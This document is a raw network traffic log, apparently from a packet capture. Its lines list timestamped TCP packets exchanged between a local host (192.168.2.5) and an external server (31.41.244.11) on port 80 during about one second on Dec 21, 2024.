                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.936542034 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.936587095 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.937621117 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.937671900 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.937693119 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.937737942 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.938751936 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.938796043 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.938925028 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.938966990 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.939908981 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.939977884 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.940083981 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.940134048 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.941092014 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.941205025 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.941209078 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.941250086 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.942245960 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.942301035 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.942363977 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.942445993 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.943413019 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.943464041 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.943530083 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.943612099 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.944571972 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.944653034 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.944690943 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.944755077 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.945763111 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.945813894 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.945847988 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:16.945889950 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.077681065 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.077743053 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.077799082 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.077946901 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.078248978 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.078291893 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.078357935 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.078890085 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.079370022 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.079412937 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.079538107 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.079782963 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.080526114 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.080648899 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.080934048 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.080986023 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.081044912 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.081089973 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.082075119 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.082128048 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.082206011 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.082254887 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.083266973 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.083307981 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.083370924 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.083415031 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.084412098 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.084531069 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.084582090 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.085577011 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.085700035 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.085751057 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.086755991 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.086802006 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.086885929 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.086930990 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.087903023 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.087956905 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.088011026 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.088072062 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.089066982 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.089200974 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.089209080 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.089255095 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.090240002 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.090285063 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.090364933 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.090410948 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.091432095 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.091465950 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.091511011 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.092573881 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.092689991 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.092746019 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.093791962 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.093844891 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.094017982 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.094064951 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.094888926 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.094933033 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.094970942 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.095719099 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.096045017 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.096087933 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.096179008 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.096445084 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.097198963 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.097318888 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.097366095 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.098361015 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.098407984 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.098531961 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.099035025 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.099536896 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.099581957 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.099597931 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.099613905 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.100701094 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.100794077 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.100824118 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.100862980 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.101881027 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.101931095 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.102027893 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.102070093 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.103034973 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.103092909 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.103136063 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.103174925 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.104368925 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.104420900 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.104424953 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.104499102 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.105421066 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.105464935 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.105489969 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.106168985 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.106559992 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.106601000 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.106703043 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.107259989 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.107953072 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.107990980 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.108165979 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.108355999 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.109091997 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.109134912 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.109253883 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.109530926 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.110435963 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.110508919 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.110532999 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.111192942 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.111218929 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.111222982 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.111237049 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.111260891 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.112380028 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.112421036 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.112463951 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.112512112 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.114527941 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.114574909 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.114648104 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.114734888 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.114751101 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.114780903 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.114804029 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.115923882 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.116100073 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.116126060 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.116139889 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.117053032 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.117115974 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.117163897 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.117216110 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.118204117 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.118613958 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.118664980 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.119410992 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.119472027 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.119524956 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.120584965 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.120729923 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.120779037 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.121758938 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.121805906 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.121885061 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.122934103 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.122987986 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.123033047 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.124160051 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.124207020 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.124275923 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.124425888 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.125210047 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.125276089 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.125319004 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.125411987 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.126372099 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.126421928 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.126483917 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.126528025 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.127530098 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.127578020 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.127650023 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.127695084 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.128726959 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.128842115 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.128896952 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.129995108 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.130106926 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.130156994 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.131043911 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.131087065 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.131267071 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.132195950 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.132237911 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.132318020 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.132441998 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.133358955 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.133505106 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.133550882 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.134529114 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.134650946 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.134696007 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.135737896 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.135782003 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.135859013 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.136446953 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.136851072 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.136895895 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.136965990 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.137007952 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.138019085 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.138065100 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.138088942 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.138135910 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.269784927 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.269799948 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.269831896 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.269853115 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.270009041 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.270056009 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.270123959 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.270167112 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.271164894 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.271213055 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.271260023 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.271306038 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.273011923 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.273030996 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.273053885 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.273067951 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.273176908 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.273241997 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.273480892 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.273574114 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.274708033 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.274725914 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.274749994 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.274761915 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.275579929 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.275649071 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.275676012 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.275691986 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.276696920 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.276758909 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.276798010 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.276844978 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.277925968 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.277970076 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.277980089 CET4982880192.168.2.531.41.244.11
